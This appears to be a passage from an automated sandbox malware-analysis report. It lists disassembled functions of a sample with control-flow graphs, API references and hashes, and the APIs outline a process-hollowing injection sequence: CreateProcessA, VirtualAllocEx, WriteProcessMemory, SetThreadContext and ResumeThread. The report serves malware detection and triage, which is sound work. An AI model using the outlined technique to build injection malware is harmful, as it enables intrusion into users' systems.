                                                            • GetCurrentProcess.KERNEL32 ref: 0157D1B0
                                                            • GetCurrentThreadId.KERNEL32 ref: 0157D209
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 73a1b63ff91699f0be658b9a5bac67ebd523175eb2a228331fb7d0a8d87b6a46
                                                            • Instruction ID: 952442a10f8607d1e992a001dbd79cf3cf46dbb6eb4855d905253e53f44eac66
                                                            • Opcode Fuzzy Hash: 73a1b63ff91699f0be658b9a5bac67ebd523175eb2a228331fb7d0a8d87b6a46
                                                            • Instruction Fuzzy Hash: 935146B0900709CFEB54DFAAE548B9EBBF1FF88310F24845AD509AB360D7349984CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F96F4 Relevance: 1.8, APIs: 1, Instructions: 260processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 44 77f96f4-77f96f6 45 77f96ff 44->45 46 77f96f8 44->46 47 77f9703-77f9795 45->47 48 77f96fa 46->48 49 77f96d1-77f96e8 46->49 53 77f97ce-77f97ee 47->53 54 77f9797-77f97a1 47->54 48->47 50 77f96fc-77f96fe 48->50 50->45 61 77f9827-77f9856 53->61 62 77f97f0-77f97fa 53->62 54->53 55 77f97a3-77f97a5 54->55 57 77f97c8-77f97cb 55->57 58 77f97a7-77f97b1 55->58 57->53 59 77f97b5-77f97c4 58->59 60 77f97b3 58->60 59->59 63 77f97c6 59->63 60->59 68 77f988f-77f9949 CreateProcessA 61->68 69 77f9858-77f9862 61->69 62->61 64 77f97fc-77f97fe 62->64 63->57 66 77f9821-77f9824 64->66 67 77f9800-77f980a 64->67 66->61 70 77f980e-77f981d 67->70 71 77f980c 67->71 82 77f994b-77f9951 68->82 83 77f9952-77f99d8 68->83 69->68 72 77f9864-77f9866 69->72 70->70 73 77f981f 70->73 71->70 74 77f9889-77f988c 72->74 75 77f9868-77f9872 72->75 73->66 74->68 77 77f9876-77f9885 75->77 78 77f9874 75->78 77->77 79 77f9887 77->79 78->77 79->74 82->83 93 77f99da-77f99de 83->93 94 77f99e8-77f99ec 83->94 93->94 95 77f99e0 93->95 96 77f99ee-77f99f2 94->96 97 77f99fc-77f9a00 94->97 95->94 96->97 98 77f99f4 96->98 99 77f9a02-77f9a06 97->99 100 77f9a10-77f9a14 97->100 98->97 99->100 101 77f9a08 99->101 102 77f9a26-77f9a2d 100->102 103 77f9a16-77f9a1c 100->103 101->100 104 77f9a2f-77f9a3e 102->104 105 77f9a44 102->105 103->102 104->105 107 77f9a45 105->107 107->107
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077F9936
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: ce8a47f9f22ee61cef048a99d9f1ba080eb445a2419871dc1107707f332b1f92
                                                            • Instruction ID: b1b177aac01bc133577403e9ba83b3bc93568579994788b591aad1a9a6f0d84d
                                                            • Opcode Fuzzy Hash: ce8a47f9f22ee61cef048a99d9f1ba080eb445a2419871dc1107707f332b1f92
                                                            • Instruction Fuzzy Hash: B0A149B1D0021ACBDB24CF69C9417EDBBB2AB44310F148569DA18E6340D775A985CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F9700 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 108 77f9700-77f9795 111 77f97ce-77f97ee 108->111 112 77f9797-77f97a1 108->112 119 77f9827-77f9856 111->119 120 77f97f0-77f97fa 111->120 112->111 113 77f97a3-77f97a5 112->113 115 77f97c8-77f97cb 113->115 116 77f97a7-77f97b1 113->116 115->111 117 77f97b5-77f97c4 116->117 118 77f97b3 116->118 117->117 121 77f97c6 117->121 118->117 126 77f988f-77f9949 CreateProcessA 119->126 127 77f9858-77f9862 119->127 120->119 122 77f97fc-77f97fe 120->122 121->115 124 77f9821-77f9824 122->124 125 77f9800-77f980a 122->125 124->119 128 77f980e-77f981d 125->128 129 77f980c 125->129 140 77f994b-77f9951 126->140 141 77f9952-77f99d8 126->141 127->126 130 77f9864-77f9866 127->130 128->128 131 77f981f 128->131 129->128 132 77f9889-77f988c 130->132 133 77f9868-77f9872 130->133 131->124 132->126 135 77f9876-77f9885 133->135 136 77f9874 133->136 135->135 137 77f9887 135->137 136->135 137->132 140->141 151 77f99da-77f99de 141->151 152 77f99e8-77f99ec 141->152 151->152 153 77f99e0 151->153 154 77f99ee-77f99f2 152->154 155 77f99fc-77f9a00 152->155 153->152 154->155 156 77f99f4 154->156 157 77f9a02-77f9a06 155->157 158 77f9a10-77f9a14 155->158 156->155 157->158 159 77f9a08 157->159 160 77f9a26-77f9a2d 158->160 161 77f9a16-77f9a1c 158->161 159->158 162 77f9a2f-77f9a3e 160->162 163 77f9a44 160->163 161->160 162->163 165 77f9a45 163->165 165->165
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077F9936
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 9616535e0f1de764e02a3381e605f10a029d6e0f11134ad9b31f2f1dbddb66d7
                                                            • Instruction ID: bee58b7580d10e9f693257ef6a14ab362051d4f0b1d7e25ad9bb253c756525f1
                                                            • Opcode Fuzzy Hash: 9616535e0f1de764e02a3381e605f10a029d6e0f11134ad9b31f2f1dbddb66d7
                                                            • Instruction Fuzzy Hash: 8D914BB1D0021ADFEB14CF69C9417EDBAB2BF48310F1485A9EA48E7340D775A985CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157AE30 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 166 157ae30-157ae3f 167 157ae41-157ae4e call 1579838 166->167 168 157ae6b-157ae6f 166->168 175 157ae64 167->175 176 157ae50 167->176 169 157ae83-157aec4 168->169 170 157ae71-157ae7b 168->170 177 157aec6-157aece 169->177 178 157aed1-157aedf 169->178 170->169 175->168 223 157ae56 call 157b11c 176->223 224 157ae56 call 157b0c8 176->224 225 157ae56 call 157b0b8 176->225 177->178 180 157af03-157af05 178->180 181 157aee1-157aee6 178->181 179 157ae5c-157ae5e 179->175 182 157afa0-157b01c 179->182 183 157af08-157af0f 180->183 184 157aef1 181->184 185 157aee8-157aeef call 157a814 181->185 216 157b01e-157b046 182->216 217 157b048-157b060 182->217 187 157af11-157af19 183->187 188 157af1c-157af23 183->188 186 157aef3-157af01 184->186 185->186 186->183 187->188 190 157af25-157af2d 188->190 191 157af30-157af39 call 157a824 188->191 190->191 197 157af46-157af4b 191->197 198 157af3b-157af43 191->198 199 157af4d-157af54 197->199 200 157af69-157af6d 197->200 198->197 199->200 202 157af56-157af66 call 157a834 call 157a844 199->202 203 157af73-157af76 200->203 202->200 206 157af99-157af9f 203->206 207 157af78-157af96 203->207 207->206 216->217 218 157b062-157b065 217->218 219 157b068-157b093 GetModuleHandleW 217->219 218->219 220 157b095-157b09b 219->220 221 157b09c-157b0b0 219->221 220->221 223->179 224->179 225->179
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0157B086
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: e17dd5573f63395a0a0eb9deca04528eb0dd8405a820a399233459ad4b6d8fd1
                                                            • Instruction ID: 522510019b139cc0fc4726264db19222f8cb073880d65911ad6cc36392a9d09a
                                                            • Opcode Fuzzy Hash: e17dd5573f63395a0a0eb9deca04528eb0dd8405a820a399233459ad4b6d8fd1
                                                            • Instruction Fuzzy Hash: B48147B0A00B058FDB24DF2AE04575EBBF1FF88204F04892ED55ADBA51D735E845CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 226 157449c-15759d9 CreateActCtxA 229 15759e2-1575a3c 226->229 230 15759db-15759e1 226->230 237 1575a3e-1575a41 229->237 238 1575a4b-1575a4f 229->238 230->229 237->238 239 1575a51-1575a5d 238->239 240 1575a60 238->240 239->240 242 1575a61 240->242 242->242
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 015759C9
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 062c4a37cb10895e0c15d0e4a594c037cc0a9f5057d66eae662ce864dc96b6e1
                                                            • Instruction ID: 130a62a5e258f764d62757b2962d5aa76209a9cc83539d5a4f170a099e21a78e
                                                            • Opcode Fuzzy Hash: 062c4a37cb10895e0c15d0e4a594c037cc0a9f5057d66eae662ce864dc96b6e1
                                                            • Instruction Fuzzy Hash: 0F410170C1071DCBEB24DFA9C885B8DBBF1BF49304F20806AD508AB255DBB16945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 243 157590c-1575910 244 157591c-15759d9 CreateActCtxA 243->244 246 15759e2-1575a3c 244->246 247 15759db-15759e1 244->247 254 1575a3e-1575a41 246->254 255 1575a4b-1575a4f 246->255 247->246 254->255 256 1575a51-1575a5d 255->256 257 1575a60 255->257 256->257 259 1575a61 257->259 259->259
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 015759C9
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 5dfce20f60e0ab6864ca35d1f071131bf82c45281559123cb5bc1d951c74f4ae
                                                            • Instruction ID: 4dbf2fa630a55d717523093b5ac101d8d18f3347825992129ab94774326e097b
                                                            • Opcode Fuzzy Hash: 5dfce20f60e0ab6864ca35d1f071131bf82c45281559123cb5bc1d951c74f4ae
                                                            • Instruction Fuzzy Hash: A8410FB0C0071DCBEB24DFA9C885B8DBBF1BF89304F20806AD518AB255DBB56945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F9473 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 260 77f9473-77f94c6 262 77f94c8-77f94d4 260->262 263 77f94d6-77f9515 WriteProcessMemory 260->263 262->263 265 77f951e-77f954e 263->265 266 77f9517-77f951d 263->266 266->265
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077F9508
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 568ced23183ac604218a261b4ce8ed7788c8fd6761579f3cd622cdd4e49f7f2c
                                                            • Instruction ID: c4bef7dbe5c27e420082fbf97ee9a5f3ba9e8029ff0a5bf88d502ad267aa3ac7
                                                            • Opcode Fuzzy Hash: 568ced23183ac604218a261b4ce8ed7788c8fd6761579f3cd622cdd4e49f7f2c
                                                            • Instruction Fuzzy Hash: 4C2137B5900319DFDB00CFA9C9817EEBBF5BF48310F10882AE619A7250D7789544CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F9478 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 270 77f9478-77f94c6 272 77f94c8-77f94d4 270->272 273 77f94d6-77f9515 WriteProcessMemory 270->273 272->273 275 77f951e-77f954e 273->275 276 77f9517-77f951d 273->276 276->275
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077F9508
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 9a73359301ef7baa4687eebe47b141bd3b2e9981cae4594fba09a72d51b8d34a
                                                            • Instruction ID: bc7e151be83686cbcf3714a2fc504501778b1f405e771a7d7ed920a525969d25
                                                            • Opcode Fuzzy Hash: 9a73359301ef7baa4687eebe47b141bd3b2e9981cae4594fba09a72d51b8d34a
                                                            • Instruction Fuzzy Hash: BB2117B19003599FDB10CFA9C985BDEBBF5FF48310F108429E619A7240D7789544CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157D2F8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 280 157d2f8-157d2fc 281 157d342-157d394 DuplicateHandle 280->281 282 157d2fe-157d33f 280->282 283 157d396-157d39c 281->283 284 157d39d-157d3ba 281->284 282->281 283->284
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0157D387
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 4099058fb1d453206e447ae29d3a2ee514748602a9e60b53440190b43346ff96
                                                            • Instruction ID: 10c6d0d6d40b8463e7a601ec9afb40fa0b2d0d4e4f4cee4607b90af564054cd6
                                                            • Opcode Fuzzy Hash: 4099058fb1d453206e447ae29d3a2ee514748602a9e60b53440190b43346ff96
                                                            • Instruction Fuzzy Hash: 292157B5800389DFDB10CFA9E584BDEBFF4AF49320F14805AE954A7251C338A950CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F9560 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 299 77f9560-77f9562 300 77f956b-77f95f5 ReadProcessMemory 299->300 301 77f9564-77f9567 299->301 304 77f95fe-77f962e 300->304 305 77f95f7-77f95fd 300->305 301->300 305->304
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077F95E8
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: d3f0f02ab66e315ec89473336dd1ca90d79b76386e122ea4210687f14369935c
                                                            • Instruction ID: b9f52153ef0a9a827393f93ff522a0a88ca28fdd720db2196cff5bee8c0abc4f
                                                            • Opcode Fuzzy Hash: d3f0f02ab66e315ec89473336dd1ca90d79b76386e122ea4210687f14369935c
                                                            • Instruction Fuzzy Hash: F42105B5900359DFDB10CFA9C981BEEBBF5BF48310F14842AE619A7240C7399905DF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F92D8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 287 77f92d8-77f92da 288 77f92dc-77f92df 287->288 289 77f92e3-77f932b 287->289 288->289 291 77f932d-77f9339 289->291 292 77f933b-77f936b Wow64SetThreadContext 289->292 291->292 294 77f936d-77f9373 292->294 295 77f9374-77f93a4 292->295 294->295
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077F935E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 7ff2570fa087ba4beb202a70b2a09041836e649009c20e6dde8e852e154a62ed
                                                            • Instruction ID: 01baf91566971f07e0b5026b782424bacad2880b188606fc560cc00ebaf820ae
                                                            • Opcode Fuzzy Hash: 7ff2570fa087ba4beb202a70b2a09041836e649009c20e6dde8e852e154a62ed
                                                            • Instruction Fuzzy Hash: 5B215CB1D003099FDB10CFA9C585BAEBBF4AF48350F148429D619A7340C738A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F9568 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 320 77f9568-77f95f5 ReadProcessMemory 324 77f95fe-77f962e 320->324 325 77f95f7-77f95fd 320->325 325->324
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077F95E8
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 5a131f411b2dfc810b0d238a321208d11be94c6c474fac8704a78a2c0ae0024a
                                                            • Instruction ID: e5610ad09f04339c6a6ab05a9db92885420f9437ead557985cc8d2411be42648
                                                            • Opcode Fuzzy Hash: 5a131f411b2dfc810b0d238a321208d11be94c6c474fac8704a78a2c0ae0024a
                                                            • Instruction Fuzzy Hash: B021F8B19003599FDB10DFAAC981BDEBBF5FF48310F108429E619A7240D7799544CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F92E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 309 77f92e0-77f932b 312 77f932d-77f9339 309->312 313 77f933b-77f936b Wow64SetThreadContext 309->313 312->313 315 77f936d-77f9373 313->315 316 77f9374-77f93a4 313->316 315->316
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077F935E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: f82867bd85bfe4122d4695fa5d92dee490f2ef461926d82e993928221c2b82b7
                                                            • Instruction ID: abccbbec72f2789cc3bba98dd8114f296dd58ab3c2d887f7e4037482a8e4f75a
                                                            • Opcode Fuzzy Hash: f82867bd85bfe4122d4695fa5d92dee490f2ef461926d82e993928221c2b82b7
                                                            • Instruction Fuzzy Hash: 6E2149B19003099FDB10CFAAC585BEEBBF4EF88310F148429D619A7340C778A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 329 157d300-157d394 DuplicateHandle 330 157d396-157d39c 329->330 331 157d39d-157d3ba 329->331 330->331
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0157D387
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 045f6fdf15f42edf4d9372427c1404a7560fc08e95db64acc599b526ad353b38
                                                            • Instruction ID: ca34434a603412c8b58f23298b5c76b245bb2d630dc38d7efdcabbd7ff6a880c
                                                            • Opcode Fuzzy Hash: 045f6fdf15f42edf4d9372427c1404a7560fc08e95db64acc599b526ad353b38
                                                            • Instruction Fuzzy Hash: DE21C4B5900249DFDB10CFAAD985ADEBBF8FF48310F14841AE918A7350D378A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F93B0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077F9426
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: fd977577ec75811477bfeb54cb63979dfc69b273a4b52d00988571c4f8f23439
                                                            • Instruction ID: 9debb2305fb1c38bdf1c9bfc844a472ca0f70d0480f84b9fd1ff8f16156ad07a
                                                            • Opcode Fuzzy Hash: fd977577ec75811477bfeb54cb63979dfc69b273a4b52d00988571c4f8f23439
                                                            • Instruction Fuzzy Hash: 8F1144B69002499FDF10DFA9C945BEEBBF5AF88310F248819E619A7250C739A500CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157B101,00000800,00000000,00000000), ref: 0157B312
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 444cfb16b68c0b4c8f5900eccbcc498915b332c159a0137edbfbb5b12eaa3d52
                                                            • Instruction ID: e33df8ff23eff1820efeb010464117ffc8d706e7bf8dea64d8d319d8b9553937
                                                            • Opcode Fuzzy Hash: 444cfb16b68c0b4c8f5900eccbcc498915b332c159a0137edbfbb5b12eaa3d52
                                                            • Instruction Fuzzy Hash: 3A11D3B69003499FDB10CF9AD445A9EFBF4EB48710F10842AD919AB200C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157B2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157B101,00000800,00000000,00000000), ref: 0157B312
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 0c1a67ae9106de97373f4f478c9f2d023f1f375e9c5f089a089ae3f7cbfd8a2e
                                                            • Instruction ID: d18e40ff819bc7e06bc2f626473b8d3c287154c14ed7e3327864a1fa81d31e39
                                                            • Opcode Fuzzy Hash: 0c1a67ae9106de97373f4f478c9f2d023f1f375e9c5f089a089ae3f7cbfd8a2e
                                                            • Instruction Fuzzy Hash: 4A1112B6900349CFDB10CFAAD844ADEFBF4AF88310F14842AD919AB300C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F93B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077F9426
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 72bd45420c9eb027c69241fca49c8e36807bbff4e9137b8bc422597a93db674d
                                                            • Instruction ID: e476051c9cd074641cc7d2828385a4e01a9dbffcf8317a7eab2746d31ced0207
                                                            • Opcode Fuzzy Hash: 72bd45420c9eb027c69241fca49c8e36807bbff4e9137b8bc422597a93db674d
                                                            • Instruction Fuzzy Hash: 371126719003499FDF10DFAAC845BEFBBF5AF88710F148819E615A7250C779A540CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077F8DF1 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_77f0000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: d3aa1877ff62dd4d0936ba38a4294ae41318792b958900ebbe8a15b842638822
                                                            • Instruction ID: ba60eac7b1c37663571b2b1eaf7b0b713fda688737bff919fe6cb8df3e30f0e7
                                                            • Opcode Fuzzy Hash: d3aa1877ff62dd4d0936ba38a4294ae41318792b958900ebbe8a15b842638822
                                                            • Instruction Fuzzy Hash: 8F1158B19003498FDB20DFAAD4457DEBBF4EF88720F148829D519A7340C739A940CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 077FB39F Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 077FD23D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2159490760.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
